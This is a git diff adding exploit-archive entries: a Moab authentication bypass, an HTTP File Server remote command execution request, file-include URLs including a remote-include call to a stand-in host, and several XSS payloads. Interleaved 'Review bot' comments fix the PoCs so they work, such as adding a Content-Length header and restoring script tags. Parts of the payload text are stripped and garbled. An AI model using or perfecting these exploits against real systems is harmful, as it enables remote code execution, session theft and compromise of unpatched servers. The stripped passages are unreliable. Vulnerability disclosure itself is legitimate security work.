diff --git a/platforms/multiple/webapps/34865.txt b/platforms/multiple/webapps/34865.txt
new file mode 100755
index 000000000..5b96adb07
--- /dev/null
+++ b/platforms/multiple/webapps/34865.txt
@@ -0,0 +1,110 @@
+##[Moab Authentication Bypass : CVE-2014-5300]##
+
+Software: Moab
+Affected Versions: All versions prior to Moab 7.2.9 and Moab 8
+CVE Reference: CVE-2014-5300
+Author: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)
+Severity: High Risk
+Vendor: Adaptive Computing
+Vendor Response: Resolved in Moab 7.2.9 and Moab 8
+
+
+##[Description]
+
+It is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.
+
+
+##[Impact]
+
+Successful exploitation could lead to remote code execution.
+
+
+##[Cause]
+
+The Moab server does not appropriately authenticate requests.
+
+
+##[Solution]
+
+Upgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.
+
+This issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.
+
+
+##[Technical Details]
+
+Moab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below:
+
+
+
+ 7v49VzAlbyNQ4O3VChCus+v2LeE=
+ QG13cmxhYnMgRWFzdGVyIEVnZyE=
+
+
+
+
+
+ test
+ test
+ test
+ /home/test
+ 2
+ /usr/bin/id
+ PBS
+ \START/usr/bin/id\0a\0a
+
+
+
+
+
+Contained within this message is a element, which contains both a and elements. The is simply a SHA1 sum of the element. The , however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.
+
+However, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a element.
+
+The following message contains no signature element and therefore will be accepted by the server:
+
+
+
+
+
+
+ test
+ test
+ test
+ /home/test
+ 2
+
+ /usr/bin/id
+ PBS
+ \START/usr/bin/id\0a\0a
+
+
+
+
+
+With no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.
+
+
+##[Proof of Concept]
+
+In addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering):
+
+00000238
+
+
+Sending the entire message above (including the size value) will enable root jobs on a vulnerable server.
+
+
+##[Detailed Timeline]
+
+2014-07-08 : Vulnerability identified and detailed information passed to Adaptive
+2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue
+2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue
+2014-07-14 : Moab 8 released
+2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge
+2014-09-08 : Release of advisory to HPC community
+2014-09-16 : Moab 7.2.9 released
+2014-09-25 : Public release of advisory
+
+
+http://labs.mwrinfosecurity.com
\ No newline at end of file
diff --git a/platforms/php/webapps/34840.txt b/platforms/php/webapps/34840.txt
new file mode 100755
index 000000000..4ec3fc840
--- /dev/null
+++ b/platforms/php/webapps/34840.txt
@@ -0,0 +1,70 @@
+source: http://www.securityfocus.com/bid/44066/info
+
+Ronny CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Ronny CMS 1.1 r935 is vulnerable; other versions may also be affected.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
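Review bot: The body of 34840.txt after the "Ronny CMS 1.1 r935 is vulnerable" line is nothing but empty `+` lines, although the hunk header promises 70 lines; the High-Tech Bridge proof-of-concept (the request/response pairs naming the injectable fields) appears to have been stripped on import, most likely because it contained raw HTML. As committed the entry names no parameter, no URL and no payload, so it cannot be reproduced or used to write a detection. Restore the PoC from the BID 44066 source or the vendor advisory, or at minimum add a line listing the affected parameters, e.g. `Vulnerable parameters: <name(s) from the HTB advisory>` with HTML-sensitive characters escaped so they survive the next import.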
diff --git a/platforms/php/webapps/34841.txt b/platforms/php/webapps/34841.txt
new file mode 100755
index 000000000..83c21d71f
--- /dev/null
+++ b/platforms/php/webapps/34841.txt
@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/44069/info
+
+PluXml is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+PluXml 5.0.1 is vulnerable; prior versions may also be affected.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
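Review bot: The body of 34841.txt after the "PluXml 5.0.1 is vulnerable" line is only empty `+` lines, although the hunk header promises 73 lines; the PoC requests from the High-Tech Bridge advisory appear to have been lost on import, presumably because they were raw HTML. Without the injection points the entry is not actionable for either a tester or a WAF/IDS rule author. Restore the PoC from the BID 44069 source, or at least add a line such as `Vulnerable parameters: <name(s) from the HTB advisory>` with `<`/`>` escaped so the content is preserved.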
diff --git a/platforms/php/webapps/34842.txt b/platforms/php/webapps/34842.txt
new file mode 100755
index 000000000..1aa6ea699
--- /dev/null
+++ b/platforms/php/webapps/34842.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44103/info
+
+TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to TWiki 5.0.1 are vulnerable.
+
+GET /twiki/bin/view?rev=%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E
\ No newline at end of file
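Review bot: The payload on the `GET /twiki/bin/view?rev=` line calls `alert(Hello)` with an undefined identifier, so even when the injection lands the script throws a ReferenceError and shows nothing; use `alert(1)` or quote the string, `alert(%27Hello%27)`, so the PoC gives a visible result. The leading `%27%3E` presumably breaks out of a single-quoted attribute in the rendered page; stating that context (and that `rev` is the only parameter exercised here) would make the entry easier to reproduce.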
diff --git a/platforms/php/webapps/34843.txt b/platforms/php/webapps/34843.txt
new file mode 100755
index 000000000..c71a3fb8a
--- /dev/null
+++ b/platforms/php/webapps/34843.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44103/info
+
+TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to TWiki 5.0.1 are vulnerable.
+
+GET /twiki/bin/login?origurl=&ANYTHING%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E
\ No newline at end of file
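Review bot: The payload on the `GET /twiki/bin/login?origurl=&ANYTHING...` line calls `alert(Hello)` with an undefined identifier, so the script throws a ReferenceError rather than popping a dialog; use `alert(1)` or `alert(%27Hello%27)`. It is also worth spelling out that the injection sits in a parameter *name* (the text after `&`, not a value), which is what makes this "multiple parameter" XSS: any extra query key is reflected, not just `origurl`.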
diff --git a/platforms/php/webapps/34845.txt b/platforms/php/webapps/34845.txt
new file mode 100755
index 000000000..6f6161626
--- /dev/null
+++ b/platforms/php/webapps/34845.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44136/info
+
+PHP Photo Vote is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHP Photo Vote 1.3F is vulnerable; other versions may also be affected.
+
+http://www.example.com/demo/photovote/login.php?page=">
\ No newline at end of file
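Review bot: The PoC URL on the last line stops at `page=">`, which only closes an attribute; the tag that followed appears to have been stripped on import (likely treated as HTML), so as written the request demonstrates nothing. Restore the script element from the BID 44136 source, URL-encoded so it survives, e.g. `login.php?page=%22%3E%3Cscript%3Ealert(1)%3C/script%3E`.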
diff --git a/platforms/php/webapps/34847.txt b/platforms/php/webapps/34847.txt
new file mode 100755
index 000000000..3ef966a8b
--- /dev/null
+++ b/platforms/php/webapps/34847.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44142/info
+
+PHP Easy Shopping Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHP Easy Shopping Cart 3.1R is vulnerable; others versions may also be affected.
+
+http://example.com/subitems.php?id=[NB]&name=[XSS]
+
+http://example.com/demo/plant/subitems.php?id=16&name=">
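Review bot: The concrete PoC on the last line ends at `name=">`, with the injected element missing, so it only terminates an attribute and does not show the XSS; the tag was presumably stripped on import. Restore it from the BID 44142 source in URL-encoded form, e.g. `subitems.php?id=16&name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E`, so the `[XSS]` placeholder on the line above has a working instantiation.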
diff --git a/platforms/php/webapps/34849.txt b/platforms/php/webapps/34849.txt
new file mode 100755
index 000000000..795d2410a
--- /dev/null
+++ b/platforms/php/webapps/34849.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44165/info
+
+AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.
+
+AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00
+
+http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt?
\ No newline at end of file
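Review bot: The LFI line relies on `%00` terminating the include path after `boot.ini`; PHP stopped honouring null bytes in file paths in 5.3.4, so that traversal only works on older interpreters and the entry should say so, e.g. `Note: the %00 truncation requires PHP < 5.3.4`. The `usr=indoushka&passw=indoushka` pair looks like the tester's own login rather than a default credential; stating which it is matters because the PoC implies `req` is only reached after authentication. The RFI line additionally needs `allow_url_include` enabled, which is off by default since PHP 5.2.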
diff --git a/platforms/php/webapps/34850.txt b/platforms/php/webapps/34850.txt
new file mode 100755
index 000000000..45d65496c
--- /dev/null
+++ b/platforms/php/webapps/34850.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/44169/info
+
+eXV2 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+eXV2 CMS 2.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/manual/caferss/example.php?rssfeedURL="%20onmouseover=prompt(1)%20xss="&submit=OK
+http://www.example.com/modules/news/archive.php?subm=">
+http://www.example.com/modules/news/topics.php?subm=">
+http://www.example.com/modules/contact/index.php?op=contact&subm=">
\ No newline at end of file
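Review bot: Three of the four PoC URLs (`archive.php?subm=">`, `topics.php?subm=">`, `contact/index.php?op=contact&subm=">`) end right after the attribute break with no injected element, so they demonstrate nothing as written; the tag appears to have been stripped on import. Only the first line, with the `onmouseover=prompt(1)` handler in `rssfeedURL`, is a complete payload. Restore the missing script element from the BID 44169 source in URL-encoded form, e.g. `subm=%22%3E%3Cscript%3Ealert(1)%3C/script%3E`.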
diff --git a/platforms/php/webapps/34852.txt b/platforms/php/webapps/34852.txt
new file mode 100755
index 000000000..bcf5db43e
--- /dev/null
+++ b/platforms/php/webapps/34852.txt
@@ -0,0 +1,44 @@
+==========================================================
+HTTP File Server 2.3a - 2.3b - 2.3c Remote Command Execution
+
+# Author : Daniele Linguaglossa
+# Date: 30/09/2014
+# Remote: Yes
+# Vendor Homepage: http://rejetto.com/
+# Software Link: http://downloads.sourceforge.net/hfs/hfs2.3c.src.zip
+# CVE: CVE-2014-7226
+# Vendor Hompage: http://www.rejetto.com
+# Tested on: Windows 8
+# Version: 2.3a - 2.3b - 2.3c
+
+The latest HTTP File Server (2.3c and maybe prior too) was found to be
+vulnerable to a remote command execution in the file comment features ,
+because the application did not properly validate uft-8 broken byte
+representation, in fact during parsing program won't notice that there are
+multiple invalid representation and when they are printed into the page
+will get replaced with one of these characters " { . | } " causing a macro
+to be executed.
+==========================================================
+PoC
+==========================================================
+bug-utf8.txt
+==========================================================
+POST /upload/?mode=section&id=ajax.comment HTTP/1.1
+Connection: Close
+Content-Type:application/x-www-form-urlencoded
+
+text=%c1%bb%c0%aeexec%c1%bccmd%c0%ae%c1%bd&files=x
+==========================================================
+
+Copy the following on a file called bug-utf8.txt , then open hfs and add a
+folder called upload,
+it will ask if anyone should have upload permission click yes then with
+netcat do the following:
+
+nc localhost 8080 < bug-utf8.txt
+
+if everything was fine you should see a new command prompt being executed
+from hfs.
+
+==========================================================
+EOF
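Review bot: The PoC request on the `POST /upload/?mode=section&id=ajax.comment HTTP/1.1` line carries no Content-Length (and no Host) header, so a server parsing an HTTP/1.1 request may never read the `text=` body when the file is piped in with netcat; adding `Content-Length: 50` (the body length as written, with no trailing newline) makes the request self-contained. It would also help readers to state what the overlong sequences decode to: `%c1%bb`, `%c0%ae`, `%c1%bc` and `%c1%bd` are non-shortest-form UTF-8 encodings of `{`, `.`, `|` and `}`, so the comment text becomes the HFS macro `{.exec|cmd.}`, which is the filter bypass the description describes in prose. The duplicated `Vendor Homepage` line and the `uft-8` typo are cosmetic.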
diff --git a/platforms/php/webapps/34854.txt b/platforms/php/webapps/34854.txt
new file mode 100755
index 000000000..c1538ac41
--- /dev/null
+++ b/platforms/php/webapps/34854.txt
@@ -0,0 +1,368 @@
+Document Title:
+===============
+All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1325
+
+
+Release Date:
+=============
+2014-09-29
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1327
+
+
+Common Vulnerability Scoring System:
+====================================
+3.3
+
+
+Product & Service Introduction:
+===============================
+WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a
+security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website
+security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces
+security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security
+practices and techniques.
+
+(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-09-29: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Github
+Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
+The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service.
+
+The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
+Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
+The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
+The attacker injects own script codes to the 404 detection redirect url input field and the execution occurs in the same section
+next to the input field context that gets displayed again.
+
+The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module.
+Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service.
+The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
+The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section
+next to the input field context that gets displayed again.
+
+The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
+Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
+Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious
+sources and application-side manipulation of affected or connected module context.
+
+
+Request Method(s):
+ [+] POST
+
+Vulnerable Module(s):
+ [+] Firewall - Detection 404
+ [+] FileSystem Components > Host System
+Vulnerable Parameter(s):
+ [+] 404 detection redirect url
+ [+] file name error logs url
+
+Affected Module(s):
+ [+] Firewall - Detection 404
+ [+] FileSystem Components > Host System
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or
+medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and
+steps below to continue.
+
+PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
+
+
+
404 Lockout Redirect URL:
+
<\"%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
+ A blocked visitor will be automatically redirected to this URL.
+